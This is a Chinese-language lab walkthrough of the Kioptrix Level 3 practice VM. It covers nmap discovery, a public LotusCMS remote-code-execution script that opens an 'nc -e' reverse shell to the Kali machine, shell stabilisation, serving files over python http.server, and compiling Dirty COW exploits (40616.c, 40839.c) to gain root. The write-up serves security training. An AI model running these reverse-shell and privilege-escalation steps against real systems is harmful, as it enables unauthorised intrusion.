打靶日记Kioptix Level 3(脏牛提权)

admin 2025年2月8日00:50:59评论4 views字数 1300阅读4分20秒阅读模式

一、探测靶机IP(进行信息收集)

ifconfig

ifconfig 查看自己网段,kali和靶机的网段一样
打靶日记Kioptix Level 3(脏牛提权)

nmap -p- 192.168.253.0/24 
打靶日记Kioptix Level 3(脏牛提权)

二、进入网页

在浏览器输入靶机ip即可
打靶日记Kioptix Level 3(脏牛提权)

发现这里有个login登录,还有一个LotusCMS,看看有没有历史漏洞

三、利用工具searchsploit 查找相关漏洞与exp

打靶日记Kioptix Level 3(脏牛提权)

因为oscp考试只能使用一次msf,所以不使用
打靶日记Kioptix Level 3(脏牛提权)

searchsploit -m16982

Multiple Vulnerabilities的意思为多个漏洞,没什么用,反弹不了shell

四、反弹shell

去github上搜搜https://github.com/Hood3dRob1n/LotusCMS-Exploit
甚至有个视频教,视频很详细,直接克隆,要是访问不上就直接在主机下好拖进去

git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit.git
打靶日记Kioptix Level 3(脏牛提权)

直接执行
打靶日记Kioptix Level 3(脏牛提权)

./lotusRCE.sh

执行后可以看到示例,exp使用方法:./lotusRCE.sh ip,这里ip写靶机的ip
打靶日记Kioptix Level 3(脏牛提权)

在kali开一个终端作为shell的接收端,并在exp里输入kali的ip和监听的端口,然后选择第一个“nc -e”
打靶日记Kioptix Level 3(脏牛提权)
打靶日记Kioptix Level 3(脏牛提权)

稳定shell界面

python -c"import pty; pty.spawn('/bin/bash');"
打靶日记Kioptix Level 3(脏牛提权)

五、下载exp提权

然后再查看版本号搜集信息

uname-a
lsb_release -a
打靶日记Kioptix Level 3(脏牛提权)

这里再去搜集一下

searchsploit linux 2.6.24 Privilege

发现只有这三个符合
打靶日记Kioptix Level 3(脏牛提权)

先尝试40616.c
打靶日记Kioptix Level 3(脏牛提权)

searchsploit -m40616.c
gcc -o exp 40616.c
打靶日记Kioptix Level 3(脏牛提权)

发现报错,若编译exp中出现如下-W开头的报错,可以添加-Wno参数继续编译,虽然会生成一个exp文件,但最后还是有问题

gcc -o exp 40616.c -Wno-implicit-function-declaration

搭建一个简单的 HTTP 文件服务器,默认将当前工作目录作为文件服务器的根目录,允许其他设备通过网络访问该目录下的文件

python -m http.server
打靶日记Kioptix Level 3(脏牛提权)

进入tmp目录

cd /tmp
./exp

说没有权限,后面发现只有下载在靶机里编译好之后才有执行权限,编译好的再下载进去是没有的,这个40616.c并不能提权,之后就尝试40839.c
打靶日记Kioptix Level 3(脏牛提权)

只有下载到靶机里面去了,在靶机编译才有执行权限,在这个目录chmod命令没用
打靶日记Kioptix Level 3(脏牛提权)

发现报错,尝试40839.c

searchsploit -m40839.c

将40839.c编译,发现报错,上面的40616.c还是可以编译成的,这个直接不能编译,cat进去看看
发现有使用方法,将dirty.c替换成40839.c就ok了
打靶日记Kioptix Level 3(脏牛提权)

gcc -pthread40839.c -o dirty -lcrypt
打靶日记Kioptix Level 3(脏牛提权)

可以看到编译好了,直接执行./dirty,输入新密码
打靶日记Kioptix Level 3(脏牛提权)

然后重新连一下
打靶日记Kioptix Level 3(脏牛提权)

可以看到提权成功,firefart用户已经是root组的用户

原文始发于微信公众号(泷羽Sec-临观):打靶日记Kioptix Level 3(脏牛提权)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月8日00:50:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   打靶日记Kioptix Level 3(脏牛提权)https://cn-sec.com/archives/3706861.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息